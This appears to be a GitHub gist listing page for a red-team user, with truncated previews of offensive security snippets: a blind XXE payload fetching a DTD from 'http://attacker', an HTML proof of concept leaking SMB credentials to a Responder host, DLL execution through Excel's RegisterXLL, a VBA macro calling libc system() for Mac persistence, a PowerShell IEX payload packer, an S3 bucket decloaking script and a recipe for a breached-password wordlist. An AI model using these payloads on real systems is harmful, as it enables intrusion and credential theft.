David Dlat

#!/usr/bin/env python
##
## netblock.py
## https://rmccurdy.com/.scripts/downloaded/
## Author: Michal Ludvig <michal@logix.cz>
## http://www.logix.cz/michal
##
## Simple tool to compute an IPv4 netblock covering
## all IP addresses given on the command line.
@Dlat
Dlat / breachcompilation.txt
Created April 2, 2019 09:16
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@Dlat
Dlat / bucket-disclose.sh
Created February 13, 2019 18:13 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses SOAP, unicode, POST, multipart, streaming and index listing as ways of figuring it out. You do need a valid AWS key (never the secret) to properly get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
# You need a valid key, since the errors happen after AWS validates that the key exists. We do not need the secret key, only the access key.
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@Dlat
Dlat / ExcelXLL.md
Created February 13, 2019 18:09 — forked from mgeeky/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@Dlat
Dlat / blind-xxe-payload-1.txt
Created August 20, 2018 20:11 — forked from mgeeky/blind-xxe-payload-1.txt
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
@Dlat
Dlat / vba-macro-mac-persistence.vbs
Created August 20, 2018 20:10 — forked from mgeeky/vba-macro-mac-persistence.vbs
(WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros.
#If VBA7 Then
    ' 64-bit Mac (2016)
    Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
        (ByVal command As String) As Long
    Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
        (ByVal file As String, ByVal mode As String) As LongPtr
    Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
        (ByVal str As String, ByVal file As LongPtr) As Long
    Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
        (ByVal file As LongPtr) As Long
@Dlat
Dlat / id_rsa_encryption.md
Created August 20, 2018 20:10
Encrypt/Decrypt a File using your SSH Public/Private Key on Mac OS X

A Guide to Encrypting Files with Mac OS X

This guide will demonstrate the steps required to encrypt and decrypt files using OpenSSL on Mac OS X. The working assumption is that by demonstrating how to encrypt a file with your own public key, you'll also be able to encrypt a file you plan to send to somebody else using their private key, though you may wish to use this approach to keep archived data safe from prying eyes.

Too Long, Didn't Read

Assuming you've already done the setup described later in this document, that id_rsa.pub.pcks8 is the public key you want to use, that id_rsa is the private key the recipient will use, and secret.txt is the data you want to transmit…

Encrypting

$ openssl rand 192 -out key

$ openssl aes-256-cbc -in secret.txt -out secret.txt.enc -pass file:key

@Dlat
Dlat / smb-credential-leak.html
Created August 20, 2018 20:08 — forked from mgeeky/smb-credential-leak.html
SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.
<!-- PoC for leaking SMB Credentials with listening Responder -->
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
<body onmousemove="document.getElementById(6).click()">
<a id=6 href="\\192.168.56.101\edgeleak" download></a>
</body>
@Dlat
Dlat / compressedPowershell.py
Created August 20, 2018 20:07 — forked from mgeeky/compressedPowershell.py
Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
#!/usr/bin/python3
import io
import sys
import gzip
import base64
def main(argv):
    if len(argv) < 2:
        print('Usage: ./compressedPowershell.py <input>')